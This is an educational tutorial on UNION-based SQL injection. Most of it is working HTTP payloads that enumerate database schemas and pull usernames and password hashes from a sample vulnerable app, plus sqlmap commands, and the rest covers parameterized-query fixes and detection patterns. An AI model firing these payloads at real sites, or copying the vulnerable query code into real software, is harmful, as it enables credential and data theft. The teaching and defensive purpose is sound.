UNION-based SQL injection is one of those classic web vulns that keeps showing up because the root cause is simple: untrusted input gets stitched into a SQL query. But when the stars align—same number of columns, compatible data types, and reflected output—UNION turns a boring bug into a data exfiltration pipeline. In this guide, we’ll walk through how UNION-based SQL injection works, how attackers extract data column by column, and how defenders shut it down properly. This is educational content for developers and junior security engineers: the goal is to understand the mechanics deeply enough to prevent, detect, and test safely in authorized environments.
Why UNION-based SQL injection matters
A typical SQL injection lets an attacker alter the logic of a query. UNION-based SQL injection goes a step further: it appends the results of a second SELECT statement to the original query’s result set.
That matters because if the application displays query results back to the user, an attacker may be able to make the database return arbitrary data—usernames, password hashes, schema metadata, API keys, and more.
The trick is that the injected query must satisfy SQL rules:
- The original and injected
SELECTmust return the same number of columns - The data types must be compatible position by position
- The resulting rows must be rendered somewhere in the application response
That’s why exploitation often feels methodical: find the column count, identify which columns are reflected, then extract data one chunk at a time.
A vulnerable example
Imagine a product search page backed by code like this:
<?php
$category = $_GET['category'];
$sql = "SELECT id, name, description FROM products WHERE category = '$category'";
$result = mysqli_query($conn, $sql);
?>
A normal request might look like:
GET /products.php?category=books HTTP/1.1
Host: example.com
Which produces a query like:
SELECT id, name, description
FROM products
WHERE category = 'books'
If input is not sanitized or parameterized, an attacker can break out of the string and append SQL. For example:
GET /products.php?category=books' UNION SELECT 1,2,3-- - HTTP/1.1
Host: example.com
Resulting SQL:
SELECT id, name, description
FROM products
WHERE category = 'books'
UNION
SELECT 1,2,3-- -
If successful, the page may now display values from the injected row.
How UNION works in SQL
UNION combines the results of two SELECT statements:
SELECT col1, col2 FROM table1
UNION
SELECT col1, col2 FROM table2
Important details:
- Both queries must have the same number of columns
- Corresponding columns must be type-compatible
UNIONremoves duplicates;UNION ALLkeeps them
Attackers often prefer UNION ALL because it avoids deduplication and can be faster:
SELECT id, name, description FROM products
UNION ALL
SELECT 1, 'owned', 'test'
Whether UNION ALL works depends on the DBMS and the context, but it’s worth testing.
Step 1: Confirming injectable behavior
In an authorized test, the first step is usually to observe how input affects the query.
Common probes include:
GET /products.php?category=books' HTTP/1.1
Host: example.com
If the app returns a SQL syntax error, that’s already a strong signal.
Other classic tests:
GET /products.php?category=books'-- - HTTP/1.1
Host: example.com
GET /products.php?category=books' OR '1'='1-- - HTTP/1.1
Host: example.com
These help determine:
- Is the input placed inside quotes?
- Can we terminate the original predicate?
- Are comments supported in this context?
Comment syntax varies by database:
-- comment
# comment
/* comment */
For MySQL, -- usually requires a trailing space.
Step 2: Finding the number of columns
Before a UNION payload works, the attacker needs the correct column count.
There are two common methods:
Method A: ORDER BY enumeration
If the original query has n columns, ORDER BY n may work, but ORDER BY n+1 will often trigger an error.
Try incrementing:
GET /products.php?category=books' ORDER BY 1-- - HTTP/1.1
Host: example.com
GET /products.php?category=books' ORDER BY 2-- - HTTP/1.1
Host: example.com
GET /products.php?category=books' ORDER BY 3-- - HTTP/1.1
Host: example.com
GET /products.php?category=books' ORDER BY 4-- - HTTP/1.1
Host: example.com
If ORDER BY 3 works and ORDER BY 4 fails, the query likely returns 3 columns.
Method B: UNION SELECT NULL enumeration
Another method is to try UNION SELECT with increasing numbers of NULLs:
GET /products.php?category=books' UNION SELECT NULL-- - HTTP/1.1
Host: example.com
GET /products.php?category=books' UNION SELECT NULL,NULL-- - HTTP/1.1
Host: example.com
GET /products.php?category=books' UNION SELECT NULL,NULL,NULL-- - HTTP/1.1
Host: example.com
NULL is useful because it can usually fit into many column types. When the column count matches, the query may succeed.
If the original query returns 3 columns, this payload is a likely candidate:
GET /products.php?category=books' UNION SELECT NULL,NULL,NULL-- - HTTP/1.1
Host: example.com
Step 3: Identifying reflected columns
Knowing the column count isn’t enough. You need to know which columns are actually visible in the HTTP response.
Replace NULLs with recognizable values:
GET /products.php?category=books' UNION SELECT 1,2,3-- - HTTP/1.1
Host: example.com
If the page displays something like:
- Product name:
2 - Description:
3
Then columns 2 and 3 are reflected, and those positions are useful for exfiltrating text.
This is the “column by column” mindset: each output position is a slot. Figure out which slots are visible, then place useful data into them.
For string contexts, you might need quoted values:
GET /products.php?category=books' UNION SELECT 1,'marker','test'-- - HTTP/1.1
Host: example.com
If a column expects text and you inject a number, the DBMS may coerce it—or reject it. Testing reveals what works.
Step 4: Extracting database metadata
Once reflected columns are known, attackers typically ask the database who it is and what it contains.
Current database version
MySQL:
GET /products.php?category=books' UNION SELECT 1,@@version,3-- - HTTP/1.1
Host: example.com
PostgreSQL:
GET /products.php?category=books' UNION SELECT 1,version(),3-- - HTTP/1.1
Host: example.com
Microsoft SQL Server:
GET /products.php?category=books' UNION SELECT 1,@@version,3-- - HTTP/1.1
Host: example.com
Current database name
MySQL:
GET /products.php?category=books' UNION SELECT 1,database(),3-- - HTTP/1.1
Host: example.com
PostgreSQL:
GET /products.php?category=books' UNION SELECT 1,current_database(),3-- - HTTP/1.1
Host: example.com
SQL Server:
GET /products.php?category=books' UNION SELECT 1,DB_NAME(),3-- - HTTP/1.1
Host: example.com
This helps scope the environment and identify what schema to enumerate next.
Step 5: Enumerating tables and columns
Now we move from “what DB is this?” to “what data exists here?”
MySQL: using `information_schema`
List tables in the current database:
GET /products.php?category=books' UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=database()-- - HTTP/1.1
Host: example.com
List columns for a table named users:
GET /products.php?category=books' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'-- - HTTP/1.1
Host: example.com
If multiple schemas exist, include table_schema:
GET /products.php?category=books' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_schema=database() AND table_name='users'-- - HTTP/1.1
Host: example.com
PostgreSQL
List tables:
GET /products.php?category=books' UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema='public'-- - HTTP/1.1
Host: example.com
List columns:
GET /products.php?category=books' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'-- - HTTP/1.1
Host: example.com
SQL Server
List tables:
GET /products.php?category=books' UNION SELECT 1,table_name,3 FROM information_schema.tables-- - HTTP/1.1
Host: example.com
List columns:
GET /products.php?category=books' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'-- - HTTP/1.1
Host: example.com
Step 6: Extracting data column by column
Here’s where UNION-based SQLi becomes practical. Suppose we discovered a users table with columns:
idusernameemailpassword_hash
And we know columns 2 and 3 of the response are visible.
We can start extracting one field at a time:
GET /products.php?category=books' UNION SELECT id,username,email FROM users-- - HTTP/1.1
Host: example.com
If that works, rows from users may be rendered directly.
But often the page layout only displays one or two fields cleanly. In that case, attackers concatenate multiple values into a single visible column.
MySQL concatenation
GET /products.php?category=books' UNION SELECT 1,concat(username,':',password_hash),3 FROM users-- - HTTP/1.1
Host: example.com
Or with separators for readability:
GET /products.php?category=books' UNION SELECT 1,concat(id,' | ',username,' | ',email),3 FROM users-- - HTTP/1.1
Host: example.com
PostgreSQL concatenation
GET /products.php?category=books' UNION SELECT 1,username || ':' || password_hash,3 FROM users-- - HTTP/1.1
Host: example.com
SQL Server concatenation
GET /products.php?category=books' UNION SELECT 1,username + ':' + password_hash,3 FROM users-- - HTTP/1.1
Host: example.com
This is the essence of extracting data column by column: if you can only see one useful output slot, pack the sensitive columns into that slot.
Managing row limits and pagination
Real applications often display only the first few rows, or render a single result. That means exfiltration may need to happen incrementally.
Limiting results in MySQL
GET /products.php?category=books' UNION SELECT 1,concat(username,':',password_hash),3 FROM users LIMIT 0,1-- - HTTP/1.1
Host: example.com
Then:
GET /products.php?category=books' UNION SELECT 1,concat(username,':',password_hash),3 FROM users LIMIT 1,1-- - HTTP/1.1
Host: example.com
And so on.
PostgreSQL offset/limit
GET /products.php?category=books' UNION SELECT 1,username || ':' || password_hash,3 FROM users LIMIT 1 OFFSET 0-- - HTTP/1.1
Host: example.com
SQL Server top / offset
GET /products.php?category=books' UNION SELECT TOP 1 1,username + ':' + password_hash,3 FROM users-- - HTTP/1.1
Host: example.com
When the page only shows one row, this “walk the table” approach is how data gets extracted piece by piece.
Bypassing type mismatches
Sometimes the injected value lands in a numeric column, but you want to display text. Or the DBMS complains about incompatible types.
A few techniques help:
Use `NULL` for non-visible columns
If only one output column matters, keep the others neutral:
GET /products.php?category=books' UNION SELECT NULL,concat(username,':',password_hash),NULL FROM users-- - HTTP/1.1
Host: example.com
Cast values explicitly
MySQL:
GET /products.php?category=books' UNION SELECT 1,cast(password_hash as char),3 FROM users-- - HTTP/1.1
Host: example.com
PostgreSQL:
GET /products.php?category=books' UNION SELECT 1,cast(id as text),3 FROM users-- - HTTP/1.1
Host: example.com
SQL Server:
GET /products.php?category=books' UNION SELECT 1,cast(id as varchar(100)),3 FROM users-- - HTTP/1.1
Host: example.com
Match original query types
If the first selected column is numeric, don’t force text into it. Put text in a text-compatible reflected column instead.
A realistic walkthrough
Let’s say we have this endpoint:
GET /filter?category=Gifts
Back-end query:
SELECT id, title, summary
FROM products
WHERE category = 'Gifts'
1. Probe for injection
GET /filter?category=Gifts'
Error appears. Good signal.
2. Find column count
GET /filter?category=Gifts' ORDER BY 1-- -
GET /filter?category=Gifts' ORDER BY 2-- -
GET /filter?category=Gifts' ORDER BY 3-- -
GET /filter?category=Gifts' ORDER BY 4-- -
ORDER BY 4 fails. So: 3 columns.
3. Find visible columns
GET /filter?category=Gifts' UNION SELECT 1,2,3-- -
The page shows 2 in the title field and 3 in the summary field.
4. Identify DB
GET /filter?category=Gifts' UNION SELECT 1,@@version,3-- -
Response suggests MySQL.
5. Enumerate tables
GET /filter?category=Gifts' UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=database()-- -
Interesting table appears: users.
6. Enumerate columns
GET /filter?category=Gifts' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_schema=database() AND table_name='users'-- -
Columns found: id, username, email, password_hash.
7. Extract data
GET /filter?category=Gifts' UNION SELECT 1,concat(username,' | ',email),password_hash FROM users-- -
Now the page renders usernames, emails, and hashes across visible fields.
That’s the full chain: identify, align, enumerate, extract.
Using tools safely
Manual testing teaches the mechanics best, but in authorized assessments you’ll often verify with tooling.
For example, a safe lab command with sqlmap might look like:
sqlmap -u "http://localhost/filter?category=Gifts" --batch --risk=1 --level=2
To enumerate databases in a lab:
sqlmap -u "http://localhost/filter?category=Gifts" --dbs
To enumerate tables from a chosen database:
sqlmap -u "http://localhost/filter?category=Gifts" -D appdb --tables
Use tools only where you have explicit permission. On real systems, unauthorized testing is illegal and unethical.
Why developers accidentally enable this
UNION-based SQLi usually comes from one of these patterns:
- String concatenation in SQL queries
- Legacy code using raw query APIs
- “Sanitization” based on blacklists
- Dynamic filtering/sorting built without allowlists
- Overly privileged database accounts that expose too much if compromised
A dangerous anti-pattern looks like this:
const category = req.query.category;
const sql = `SELECT id, title, summary FROM products WHERE category = '${category}'`;
const rows = await db.query(sql);
Even if developers try to strip quotes or keywords, attackers can often bypass naive filters.
Defenses that actually work
Parameterized queries
This is the primary fix. Never build SQL by concatenating user input.
Node.js with `mysql2`
const [rows] = await connection.execute(
'SELECT id, title, summary FROM products WHERE category = ?',
[req.query.category]
);
Python with `psycopg2`
cur.execute(
"SELECT id, title, summary FROM products WHERE category = %s",
(category,)
)
PHP with PDO
$stmt = $pdo->prepare("SELECT id, name, description FROM products WHERE category = ?");
$stmt->execute([$category]);
$rows = $stmt->fetchAll();
Parameterized queries ensure user input is treated as data, not executable SQL.
Stored procedures—carefully
Stored procedures can help, but only if they avoid dynamic SQL built from untrusted input.
Bad:
SET @sql = CONCAT('SELECT * FROM products WHERE category = ''', user_input, '''');
PREPARE stmt FROM @sql;
EXECUTE stmt;
Good practice means parameters, not string assembly.
Allowlist dynamic identifiers
You cannot parameterize everything. Things like column names in ORDER BY often require allowlisting.
Bad:
const sort = req.query.sort;
const sql = `SELECT id, title FROM products ORDER BY ${sort}`;
Better:
const allowed = new Set(['title', 'created_at', 'price']);
const sort = allowed.has(req.query.sort) ? req.query.sort : 'title';
const sql = `SELECT id, title FROM products ORDER BY ${sort}`;
Least privilege in the database
If the application account only needs SELECT on a few tables, don’t give it broad access.
Good restrictions include:
- No administrative privileges
- No access to unrelated schemas
- No file or command execution features
- Separate accounts per app/service where possible
This won’t prevent SQLi, but it reduces blast radius.
Generic error handling
Verbose SQL errors are gold for attackers. Don’t expose raw database exceptions to users.
Bad:
You have an error in your SQL syntax near 'UNION SELECT...'
Better:
- Return a generic error page to users
- Log detailed errors server-side
- Alert on repeated malformed query patterns
WAFs and filters are not primary controls
A WAF may detect obvious payloads, but it is not a substitute for fixing the code. Treat it as a speed bump, not a seatbelt.
Detection and testing tips for defenders
If you’re reviewing an app or building detection logic, watch for:
- Repeated single quotes in query parameters
UNION SELECT,ORDER BY,information_schema- SQL comment markers like
--,#,/* - Sudden spikes in 500 errors tied to a specific endpoint
- Response bodies containing DB version strings or schema metadata
In code review, grep for risky patterns:
grep -R "SELECT .* \+.*req\." .
grep -R "query(" .
grep -R "execute(" .
And in JavaScript/TypeScript projects, look for template literals used in SQL:
grep -R "SELECT .*${" .
Static analysis and secure code review catch a lot of these before deployment.
Key takeaways
UNION-based SQL injection is powerful because it transforms a query-manipulation bug into a data retrieval channel. The exploitation flow is usually:
- Confirm injection
- Find the number of columns
- Identify reflected columns
- Enumerate schema metadata
- Extract data column by column or by concatenating values into visible slots
For attackers in labs, it’s systematic. For defenders, that same predictability is useful: if you understand the workflow, you know exactly where to break the chain.
The real fix is boring in the best way: parameterized queries, allowlisted dynamic SQL parts, least-privileged DB accounts, and disciplined error handling. If you build with those defaults, UNION-based SQLi goes from “critical incident” to “non-event.”
And that’s the hacker lesson worth keeping: the flashy payload is never the real story. The real story is always the trust boundary you forgot to defend.